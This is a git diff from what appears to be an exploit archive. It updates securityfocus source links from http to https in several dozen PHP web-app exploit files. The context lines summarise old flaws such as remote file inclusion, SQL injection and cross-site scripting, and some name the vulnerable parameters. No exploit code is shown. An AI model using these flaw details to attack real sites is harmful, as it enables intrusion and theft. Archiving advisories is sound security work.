a/exploits/php/webapps/21961.txt b/exploits/php/webapps/21961.txt index 1462c84de..c34ae3650 100644 --- a/exploits/php/webapps/21961.txt +++ b/exploits/php/webapps/21961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6035/info +source: https://www.securityfocus.com/bid/6035/info MyMarket is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21967.txt b/exploits/php/webapps/21967.txt index 33a3ca17b..785e9abe2 100644 --- a/exploits/php/webapps/21967.txt +++ b/exploits/php/webapps/21967.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6057/info +source: https://www.securityfocus.com/bid/6057/info Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. diff --git a/exploits/php/webapps/21968.txt b/exploits/php/webapps/21968.txt index ed355b76d..030917d0e 100644 --- a/exploits/php/webapps/21968.txt +++ b/exploits/php/webapps/21968.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6057/info +source: https://www.securityfocus.com/bid/6057/info Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. diff --git a/exploits/php/webapps/21969.txt b/exploits/php/webapps/21969.txt index cf83e85de..90211edad 100644 --- a/exploits/php/webapps/21969.txt +++ b/exploits/php/webapps/21969.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6057/info +source: https://www.securityfocus.com/bid/6057/info Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. diff --git a/exploits/php/webapps/21970.txt b/exploits/php/webapps/21970.txt index 88c925ee0..e7dc5fc3f 100644 --- a/exploits/php/webapps/21970.txt +++ b/exploits/php/webapps/21970.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6057/info +source: https://www.securityfocus.com/bid/6057/info Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. diff --git a/exploits/php/webapps/21976.txt b/exploits/php/webapps/21976.txt index 3c011d13b..29f83dcde 100644 --- a/exploits/php/webapps/21976.txt +++ b/exploits/php/webapps/21976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6087/info +source: https://www.securityfocus.com/bid/6087/info Prometheus is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Prometheus. An attacker may exploit this by supplying a path to a malicious 'autoload.lib' file on a remote host as a value for the 'PROMETHEUS_LIBRARY_BASE' parameter. diff --git a/exploits/php/webapps/21977.txt b/exploits/php/webapps/21977.txt index 58c730c79..af86085a9 100644 --- a/exploits/php/webapps/21977.txt +++ b/exploits/php/webapps/21977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6088/info +source: https://www.securityfocus.com/bid/6088/info A SQL injection vulnerability has been reported for PHP-Nuke 5.6. diff --git a/exploits/php/webapps/22009.txt b/exploits/php/webapps/22009.txt index c7370731f..5d7d326c2 100644 --- a/exploits/php/webapps/22009.txt +++ b/exploits/php/webapps/22009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6153/info +source: https://www.securityfocus.com/bid/6153/info An information disclosure vulnerability has been reported for httpbench. Reportedly, httpbench may disclose the contents of web server readable files to remote attackers. 
diff --git a/exploits/php/webapps/22017.txt b/exploits/php/webapps/22017.txt index 66b0994d6..fda13c058 100644 --- a/exploits/php/webapps/22017.txt +++ b/exploits/php/webapps/22017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6173/info +source: https://www.securityfocus.com/bid/6173/info The phpBB Advanced Quick Reply Hack is prone to an issue which may allow attackers to include arbitrary files from a remote server. diff --git a/exploits/php/webapps/22030.php b/exploits/php/webapps/22030.php index 92cc7cec3..3785c47e3 100644 --- a/exploits/php/webapps/22030.php +++ b/exploits/php/webapps/22030.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6226/info +source: https://www.securityfocus.com/bid/6226/info vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/22037.txt b/exploits/php/webapps/22037.txt index 52f81d815..409e9fc5d 100644 --- a/exploits/php/webapps/22037.txt +++ b/exploits/php/webapps/22037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6244/info +source: https://www.securityfocus.com/bid/6244/info everal cross site scripting vulnerabilities have been reported for PHP-Nuke. diff --git a/exploits/php/webapps/22042.php b/exploits/php/webapps/22042.php index c74a31867..982ea628a 100644 --- a/exploits/php/webapps/22042.php +++ b/exploits/php/webapps/22042.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6246/info +source: https://www.securityfocus.com/bid/6246/info Due to insufficient sanitization of user supplied values, it is possible to exploit a vulnerability in VBulletin. By passing an invalid value to a variable located in 'members2.php', it is possible to generate an error page which will include attacker-supplied HTML code which will be executed in a legitimate users browser. diff --git a/exploits/php/webapps/22043.txt b/exploits/php/webapps/22043.txt index 392a58789..88cfa0c1d 100644 
--- a/exploits/php/webapps/22043.txt +++ b/exploits/php/webapps/22043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6248/info +source: https://www.securityfocus.com/bid/6248/info phpBB does not properly sanitize user input in forum postings. This could allow a malicious user to inject script code into a forum post which would in turn be executed when the page is viewed by other users. diff --git a/exploits/php/webapps/22044.txt b/exploits/php/webapps/22044.txt index 55b0ad7df..74c0e367e 100644 --- a/exploits/php/webapps/22044.txt +++ b/exploits/php/webapps/22044.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6251/info +source: https://www.securityfocus.com/bid/6251/info The Web Server Creator Web Portal is prone to an issue which may allow attackers to include arbitrary files from a remote server. diff --git a/exploits/php/webapps/22047.txt b/exploits/php/webapps/22047.txt index ae495b22f..ba53afd53 100644 --- a/exploits/php/webapps/22047.txt +++ b/exploits/php/webapps/22047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6258/info +source: https://www.securityfocus.com/bid/6258/info FreeNews is a freely available, open source News software package. It is written in PHP, and designed for use on Unix and Linux operating systems. diff --git a/exploits/php/webapps/22048.txt b/exploits/php/webapps/22048.txt index 196573bad..6e6b19e3c 100644 --- a/exploits/php/webapps/22048.txt +++ b/exploits/php/webapps/22048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6260/info +source: https://www.securityfocus.com/bid/6260/info News Evolution is a freely available, open source news software package. It is written in PHP, and designed for use on Unix and Linux operating systems. diff --git a/exploits/php/webapps/22065.html b/exploits/php/webapps/22065.html index 6d9c82503..b9de26d8f 100644 --- a/exploits/php/webapps/22065.html +++ b/exploits/php/webapps/22065.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6311/info +source: https://www.securityfocus.com/bid/6311/info phpBB is vulnerable to cross site scripting attacks. This is due to insufficient santization of user-supplied input. The problem is located in the search.php script. This issue may be exploited by an attacker to steal a legitimate users cookie-based authentication credentials. diff --git a/exploits/php/webapps/22073.txt b/exploits/php/webapps/22073.txt index 76d8a727a..ed086d2b6 100644 --- a/exploits/php/webapps/22073.txt +++ b/exploits/php/webapps/22073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6330/info +source: https://www.securityfocus.com/bid/6330/info A vulnerability has been reported for APBoard that may allow unauthorized users to read postings in internal forums. The vulnerability is a result of the 'useraction.php' script failing to properly check user credentials. diff --git a/exploits/php/webapps/22075.txt b/exploits/php/webapps/22075.txt index 7bca35278..b4190ba7f 100644 --- a/exploits/php/webapps/22075.txt +++ b/exploits/php/webapps/22075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6334/info +source: https://www.securityfocus.com/bid/6334/info Ultimate PHP Board (UPB) is a freely available, open source PHP Bulletin Board. It is available for the Unix and Linux operating systems. diff --git a/exploits/php/webapps/22076.txt b/exploits/php/webapps/22076.txt index 49c6b7913..2bc8622f4 100644 --- a/exploits/php/webapps/22076.txt +++ b/exploits/php/webapps/22076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6335/info +source: https://www.securityfocus.com/bid/6335/info Ultimate PHP Board (UPB) is a freely available, open source PHP Bulletin Board. It is available for the Unix and Linux operating systems. diff --git a/exploits/php/webapps/22077.txt b/exploits/php/webapps/22077.txt index 29e9228d9..543f7d60a 100644 --- a/exploits/php/webapps/22077.txt +++ b/exploits/php/webapps/22077.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6337/info +source: https://www.securityfocus.com/bid/6337/info Problems with vBulletin could make it possible for an attacker to inject arbitrary HTML in vBulletin forum messages. diff --git a/exploits/php/webapps/22080.txt b/exploits/php/webapps/22080.txt index ab666cc93..ef1cb5c5b 100644 --- a/exploits/php/webapps/22080.txt +++ b/exploits/php/webapps/22080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6344/info +source: https://www.securityfocus.com/bid/6344/info Xoops includes a Private Message System for users, so that they may send messages to one another. HTML tags used for font attributes are not sufficiently filtered of malicious HTML code. This makes it possible for an attacker to supply malicious input in the HTML font tags that contain arbitrary script code. When another user receives the attacker's private message, the malicious script code will be executed on that user in the context of the site running Xoops. diff --git a/exploits/php/webapps/22083.txt b/exploits/php/webapps/22083.txt index 82bd74760..f8fd963f4 100644 --- a/exploits/php/webapps/22083.txt +++ b/exploits/php/webapps/22083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6369/info +source: https://www.securityfocus.com/bid/6369/info A vulnerability has been discovered in VisNetic Website when generating a 404 page for a non-existent resources. The issue is due to insufficient sanitization of the HTTP 'referer' header. It is possible to cause arbitrary code to be executed within the context of the visited 404 page by embedding script code into the HTTP 'referer' header. diff --git a/exploits/php/webapps/22086.txt b/exploits/php/webapps/22086.txt index 50991d06d..1561b1a55 100644 --- a/exploits/php/webapps/22086.txt +++ b/exploits/php/webapps/22086.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6376/info +source: https://www.securityfocus.com/bid/6376/info Mambo Site Server is a freely available, open source web content management tool. It is written in PHP, and available for Unix, Linux, and Microsoft Windows operating systems. diff --git a/exploits/php/webapps/22087.txt b/exploits/php/webapps/22087.txt index c980fedc2..cd51b11a9 100644 --- a/exploits/php/webapps/22087.txt +++ b/exploits/php/webapps/22087.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6387/info +source: https://www.securityfocus.com/bid/6387/info A vulnerability has been discovered in Mambo Site Server. Requesting the 'index.php' script with an invalid parameter will cause an error page to be generated containing the path of the Mambo script. diff --git a/exploits/php/webapps/22088.txt b/exploits/php/webapps/22088.txt index 2a98af3bd..038750466 100644 --- a/exploits/php/webapps/22088.txt +++ b/exploits/php/webapps/22088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6395/info +source: https://www.securityfocus.com/bid/6395/info MyPHPLinks is a freely available, open source PHP application distributed by MyPHPSoft. It is available for Unix, Linux, and Microsoft Windows operating systems. diff --git a/exploits/php/webapps/22089.txt b/exploits/php/webapps/22089.txt index 845c2eecd..ea010da97 100644 --- a/exploits/php/webapps/22089.txt +++ b/exploits/php/webapps/22089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6399/info +source: https://www.securityfocus.com/bid/6399/info A vulnerability has been discovered in the PHP-Nuke Web Mail module. When a user opens an email that contains an attachment, the file will be put in a remotely accessible web directory. It has been reported that the vulnerable module fails to filter active content passed as attachments, thereby allowing a malicious PHP script to be stored in a web directory. 
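Review bot: The context line under the changed `source:` line in 22037.txt reads "everal cross site scripting vulnerabilities have been reported for PHP-Nuke", with the leading "S" missing. The hunk only rewrites the URL scheme, so the typo survives; fix it to "Several" in this commit or a follow-up while the file header is being touched.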
diff --git a/exploits/php/webapps/22090.txt b/exploits/php/webapps/22090.txt index d5621492a..bb7908f0e 100644 --- a/exploits/php/webapps/22090.txt +++ b/exploits/php/webapps/22090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6400/info +source: https://www.securityfocus.com/bid/6400/info A vulnerability has been discovered in the PHP-Nuke web mail module. Due to insufficient sanitization of HTML emails it is possible for an attacker to embed script code into malicious messages. Opening an email containing attacker-supplied script code would result in the execution of arbitrary script code within the client's browser. diff --git a/exploits/php/webapps/22102.txt b/exploits/php/webapps/22102.txt index e236998b4..c1638c73a 100644 --- a/exploits/php/webapps/22102.txt +++ b/exploits/php/webapps/22102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6406/info +source: https://www.securityfocus.com/bid/6406/info Multiple path disclosure vulnerabilities have been discovered in PHP-Nuke. This issue occurs when requesting a PHP script that shouldn't be accessed directly. diff --git a/exploits/php/webapps/22103.txt b/exploits/php/webapps/22103.txt index 91a140f0d..c3d1db211 100644 --- a/exploits/php/webapps/22103.txt +++ b/exploits/php/webapps/22103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6409/info +source: https://www.securityfocus.com/bid/6409/info It has been discovered that multiple PHP scripts used by PHP-Nuke are vulnerable to cross-sitescripting attacks. Due to insufficient sanitization of web requests it is possible for script code to be embedded in PHP script requests. diff --git a/exploits/php/webapps/22104.txt b/exploits/php/webapps/22104.txt index 05796cf67..f83054507 100644 --- a/exploits/php/webapps/22104.txt +++ b/exploits/php/webapps/22104.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6411/info +source: https://www.securityfocus.com/bid/6411/info An HTML injection vulnerability has been discovered in Captaris Infinite WebMail. Due to insufficient sanitization of HTML content, it is possible for an attacker to embed malicious script code into HTML email messages. diff --git a/exploits/php/webapps/22107.txt b/exploits/php/webapps/22107.txt index 5b5839b61..e10d7be02 100644 --- a/exploits/php/webapps/22107.txt +++ b/exploits/php/webapps/22107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6455/info +source: https://www.securityfocus.com/bid/6455/info Several vulnerabilities have been discovered in SPGPartenaires. The vulnerabilities are due to insufficient sanitization of the 'pass' and 'SPGP' variables used to construct SQL queries in various PHP scripts. By exploiting these issues it is possible to modify the logic of SQL queries through malformed query strings in requests for the vulnerable script. diff --git a/exploits/php/webapps/22108.txt b/exploits/php/webapps/22108.txt index 22a7911c2..5d49c9879 100644 --- a/exploits/php/webapps/22108.txt +++ b/exploits/php/webapps/22108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6455/info +source: https://www.securityfocus.com/bid/6455/info Several vulnerabilities have been discovered in SPGPartenaires. The vulnerabilities are due to insufficient sanitization of the 'pass' and 'SPGP' variables used to construct SQL queries in various PHP scripts. By exploiting these issues it is possible to modify the logic of SQL queries through malformed query strings in requests for the vulnerable script. diff --git a/exploits/php/webapps/22109.txt b/exploits/php/webapps/22109.txt index bdb6720fd..bed6b6cad 100644 --- a/exploits/php/webapps/22109.txt +++ b/exploits/php/webapps/22109.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6464/info +source: https://www.securityfocus.com/bid/6464/info W-Agora is a freely available, open source PHP forum software package. It is available for Unix and Linux systems. diff --git a/exploits/php/webapps/22114.txt b/exploits/php/webapps/22114.txt index 75b5c8a7e..7a8917c68 100644 --- a/exploits/php/webapps/22114.txt +++ b/exploits/php/webapps/22114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6496/info +source: https://www.securityfocus.com/bid/6496/info PEEL is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22115.txt b/exploits/php/webapps/22115.txt index ced18c60c..2f20481f1 100644 --- a/exploits/php/webapps/22115.txt +++ b/exploits/php/webapps/22115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6500/info +source: https://www.securityfocus.com/bid/6500/info N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22116.txt b/exploits/php/webapps/22116.txt index 121ee76a9..22f5c4854 100644 --- a/exploits/php/webapps/22116.txt +++ b/exploits/php/webapps/22116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6500/info +source: https://www.securityfocus.com/bid/6500/info N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22125.txt b/exploits/php/webapps/22125.txt index ca41ba470..991602ed5 100644 --- a/exploits/php/webapps/22125.txt +++ b/exploits/php/webapps/22125.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6523/info +source: https://www.securityfocus.com/bid/6523/info A HTML injection vulnerability has been reported for OpenTopic. The vulnerability exists because OpenTopic does not sufficiently sanitize HTML code from private message posts. diff --git a/exploits/php/webapps/22126.txt b/exploits/php/webapps/22126.txt index 10bebe771..a4c3901d9 100644 --- a/exploits/php/webapps/22126.txt +++ b/exploits/php/webapps/22126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6525/info +source: https://www.securityfocus.com/bid/6525/info DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22127.txt b/exploits/php/webapps/22127.txt index 8c7edd525..cccfd5049 100644 --- a/exploits/php/webapps/22127.txt +++ b/exploits/php/webapps/22127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6525/info +source: https://www.securityfocus.com/bid/6525/info DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22133.txt b/exploits/php/webapps/22133.txt index cdc49f338..20e255f41 100644 --- a/exploits/php/webapps/22133.txt +++ b/exploits/php/webapps/22133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6544/info +source: https://www.securityfocus.com/bid/6544/info Reportedly, myPHPNuke does not adequately filter HTML code thus making it prone to cross-site scripting attacks. It is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user. All code will be executed within the context of the website running myPHPNuke. diff --git a/exploits/php/webapps/22134.txt b/exploits/php/webapps/22134.txt index be00ea4ae..e548f4dfe 100644 --- a/exploits/php/webapps/22134.txt +++ b/exploits/php/webapps/22134.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6547/info +source: https://www.securityfocus.com/bid/6547/info S8Forum is prone to a remote command execution vulnerability. diff --git a/exploits/php/webapps/22146.txt b/exploits/php/webapps/22146.txt index 7baf2cf24..5541d696b 100644 --- a/exploits/php/webapps/22146.txt +++ b/exploits/php/webapps/22146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6591/info +source: https://www.securityfocus.com/bid/6591/info It has been reported that a problem exists in the Reminder.php script distributed as part of YaBB SE. Due to insufficient sanitizing of input, it is possible for a remote user to inject arbitrary SQL into the database used by YaBB SE that could be used to reset or change the password of a user. diff --git a/exploits/php/webapps/22148.txt b/exploits/php/webapps/22148.txt index 5555a0cdd..3808d5d59 100644 --- a/exploits/php/webapps/22148.txt +++ b/exploits/php/webapps/22148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6594/info +source: https://www.securityfocus.com/bid/6594/info A problem with phpPass may allow an attacker to launch a SQL injection attack. diff --git a/exploits/php/webapps/22149.txt b/exploits/php/webapps/22149.txt index 0a5449f38..c0d8e944f 100644 --- a/exploits/php/webapps/22149.txt +++ b/exploits/php/webapps/22149.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6595/info +source: https://www.securityfocus.com/bid/6595/info A file disclosure vulnerability has been reported for W-Agora. It has been reported that W-Agora does not adequately sanitize some user-supplied input. diff --git a/exploits/php/webapps/22150.txt b/exploits/php/webapps/22150.txt index 6b5ab70b4..367eb238e 100644 --- a/exploits/php/webapps/22150.txt +++ b/exploits/php/webapps/22150.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6595/info +source: https://www.securityfocus.com/bid/6595/info A file disclosure vulnerability has been reported for W-Agora. It has been reported that W-Agora does not adequately sanitize some user-supplied input. diff --git a/exploits/php/webapps/22163.txt b/exploits/php/webapps/22163.txt index 13e0c9b90..b03518865 100644 --- a/exploits/php/webapps/22163.txt +++ b/exploits/php/webapps/22163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6601/info +source: https://www.securityfocus.com/bid/6601/info The Geeklog 'profiles.php' script is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/22164.txt b/exploits/php/webapps/22164.txt index d9547982c..505b9d16d 100644 --- a/exploits/php/webapps/22164.txt +++ b/exploits/php/webapps/22164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6602/info +source: https://www.securityfocus.com/bid/6602/info Geeklog is prone to a cross-site scripting vulnerability in the 'users.php' script. diff --git a/exploits/php/webapps/22165.txt b/exploits/php/webapps/22165.txt index 72befb317..91985c005 100644 --- a/exploits/php/webapps/22165.txt +++ b/exploits/php/webapps/22165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6603/info +source: https://www.securityfocus.com/bid/6603/info Geeklog is prone to a cross-site scripting vulnerability in the 'comment.php' script. diff --git a/exploits/php/webapps/22166.txt b/exploits/php/webapps/22166.txt index 192a0fa48..641a20de2 100644 --- a/exploits/php/webapps/22166.txt +++ b/exploits/php/webapps/22166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6604/info +source: https://www.securityfocus.com/bid/6604/info Geeklog is prone to HTML injection attacks. diff --git a/exploits/php/webapps/22167.txt b/exploits/php/webapps/22167.txt index 13ea210dd..f03656264 100644 --- a/exploits/php/webapps/22167.txt +++ b/exploits/php/webapps/22167.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6605/info +source: https://www.securityfocus.com/bid/6605/info A vulnerability has been discovered in vAuthenticate. It has been reported that various PHP scripts used by vAuthenticate are prone to SQL injection attacks. This issue may be exploited by an unauthorized attacker to view protected web pages. diff --git a/exploits/php/webapps/22168.txt b/exploits/php/webapps/22168.txt index 65c19d945..52c14f265 100644 --- a/exploits/php/webapps/22168.txt +++ b/exploits/php/webapps/22168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6606/info +source: https://www.securityfocus.com/bid/6606/info A vulnerability has been discovered in vSignup. It has been reported that various PHP scripts used by vAuthenticate are prone to SQL injection attacks. This issue may be exploited by an unauthorized attacker to view protected web pages. diff --git a/exploits/php/webapps/22175.txt b/exploits/php/webapps/22175.txt index b9bf6dea9..02de6e2a1 100644 --- a/exploits/php/webapps/22175.txt +++ b/exploits/php/webapps/22175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6621/info +source: https://www.securityfocus.com/bid/6621/info An HTML injection vulnerability has been discovered in PHP TopSites. The issue occurs due to insufficient sanitization of user-supplied data. By injecting HTML code into the tag of the description page, when submitting website, it may be possible to cause an administrator to edit or delete database entries. diff --git a/exploits/php/webapps/22176.txt b/exploits/php/webapps/22176.txt index 25e05f383..ff8178598 100644 --- a/exploits/php/webapps/22176.txt +++ b/exploits/php/webapps/22176.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6622/info +source: https://www.securityfocus.com/bid/6622/info A vulnerability has been discovered in PHP TopSites. Due to invalid sanitization of user-supplied input by the 'help.php' script, it may be possible for an attacker to steal another users cookie information or other sensitive data. diff --git a/exploits/php/webapps/22177.txt b/exploits/php/webapps/22177.txt index 5474e4258..cbe3daeef 100644 --- a/exploits/php/webapps/22177.txt +++ b/exploits/php/webapps/22177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6625/info +source: https://www.securityfocus.com/bid/6625/info A vulnerability has been discovered in PHP TopSites. Due to insufficient sanitization of user-supplied URI parameters it is possible for an attacker to embed SQL commands into certain page requests. This may result in another users private information being disclose to an attacker. diff --git a/exploits/php/webapps/22180.txt b/exploits/php/webapps/22180.txt index 0540e7811..5ee625307 100644 --- a/exploits/php/webapps/22180.txt +++ b/exploits/php/webapps/22180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6632/info +source: https://www.securityfocus.com/bid/6632/info phpLinks is prone to HTML injection. diff --git a/exploits/php/webapps/22182.pl b/exploits/php/webapps/22182.pl index f031a1616..e92091b1f 100755 --- a/exploits/php/webapps/22182.pl +++ b/exploits/php/webapps/22182.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6634/info +source: https://www.securityfocus.com/bid/6634/info A SQL injection vulnerability has been reported for phpBB2 systems that may result in the deletion of all private messages. diff --git a/exploits/php/webapps/22186.txt b/exploits/php/webapps/22186.txt index 0c6a77d89..9297ee1e1 100644 --- a/exploits/php/webapps/22186.txt +++ b/exploits/php/webapps/22186.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6644/info +source: https://www.securityfocus.com/bid/6644/info A problem with MyRoom may make it possible for remote attackers to upload files to a vulnerable system. diff --git a/exploits/php/webapps/22192.pl b/exploits/php/webapps/22192.pl index aafc486df..25390275e 100755 --- a/exploits/php/webapps/22192.pl +++ b/exploits/php/webapps/22192.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6663/info +source: https://www.securityfocus.com/bid/6663/info YaBB SE allows remote users to influence the location of included files. A remote attacker may exploit this condition to cause an external, attacker-supplied file to be included and executed by YABB SE. diff --git a/exploits/php/webapps/22195.txt b/exploits/php/webapps/22195.txt index a2f9426dc..d26ea043a 100644 --- a/exploits/php/webapps/22195.txt +++ b/exploits/php/webapps/22195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6669/info +source: https://www.securityfocus.com/bid/6669/info It has been reported that Zorum may allow remote users to influence to location of PHP includes. Because of this, it is possible for a remote user to include an external arbitrary PHP script containing commands that may be carried out on the vulnerable host. diff --git a/exploits/php/webapps/22202.txt b/exploits/php/webapps/22202.txt index ee5c6e447..722a1ca30 100644 --- a/exploits/php/webapps/22202.txt +++ b/exploits/php/webapps/22202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6686/info +source: https://www.securityfocus.com/bid/6686/info Guestbook does not adequately filter HTML tags from various fields. This may enable an attacker to inject arbitrary script code into pages that are generated by the guestbook. diff --git a/exploits/php/webapps/22206.txt b/exploits/php/webapps/22206.txt index 8e40070ea..04e166c47 100644 --- a/exploits/php/webapps/22206.txt +++ b/exploits/php/webapps/22206.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6731/info +source: https://www.securityfocus.com/bid/6731/info Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file. diff --git a/exploits/php/webapps/22208.txt b/exploits/php/webapps/22208.txt index f655689fc..fe2e5a46b 100644 --- a/exploits/php/webapps/22208.txt +++ b/exploits/php/webapps/22208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6744/info +source: https://www.securityfocus.com/bid/6744/info myphpPageTool is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in several PHP script files in the /doc/admin folder. diff --git a/exploits/php/webapps/22209.txt b/exploits/php/webapps/22209.txt index 0387bdc8a..33dca2360 100644 --- a/exploits/php/webapps/22209.txt +++ b/exploits/php/webapps/22209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6746/info +source: https://www.securityfocus.com/bid/6746/info phpMyShop, in some cases, does not sufficiently sanitize user-supplied input which is used when constructing SQL queries. As a result, attackers may supply malicious parameters to manipulate the structure and logic of SQL queries. diff --git a/exploits/php/webapps/22211.txt b/exploits/php/webapps/22211.txt index 369a92546..942c1a983 100644 --- a/exploits/php/webapps/22211.txt +++ b/exploits/php/webapps/22211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6750/info +source: https://www.securityfocus.com/bid/6750/info A problem with PHP-Nuke could allow remote users to execute arbitrary code in the context of the web site. The problem is in the lack of sanitization of some types of input. diff --git a/exploits/php/webapps/22222.txt b/exploits/php/webapps/22222.txt index 26135a6aa..e7348e62b 100644 --- a/exploits/php/webapps/22222.txt +++ b/exploits/php/webapps/22222.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6768/info +source: https://www.securityfocus.com/bid/6768/info It has been reported that TOPo may return information to users that is sensitive in nature. Under some circumstances, it is possible to produce an error message that reveals information about web directory structure. This could result in more organized attack against system resources. diff --git a/exploits/php/webapps/22241.txt b/exploits/php/webapps/22241.txt index 589f7d035..d416774f8 100644 --- a/exploits/php/webapps/22241.txt +++ b/exploits/php/webapps/22241.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6818/info +source: https://www.securityfocus.com/bid/6818/info It has been reported that Cedric Email Reader is prone to an issue that may allow remote attackers to include malicious files located on remote servers. This issue is present in the 'email.php' script. diff --git a/exploits/php/webapps/22242.txt b/exploits/php/webapps/22242.txt index 752cd8ecd..73799c729 100644 --- a/exploits/php/webapps/22242.txt +++ b/exploits/php/webapps/22242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6820/info +source: https://www.securityfocus.com/bid/6820/info It has been reported that Cedric Email Reader is prone to an issue that may allow remote attackers to include malicious files located on remote servers. This issue is present in the 'emailreader_execute_on_each_page.inc.php' script. diff --git a/exploits/php/webapps/22252.txt 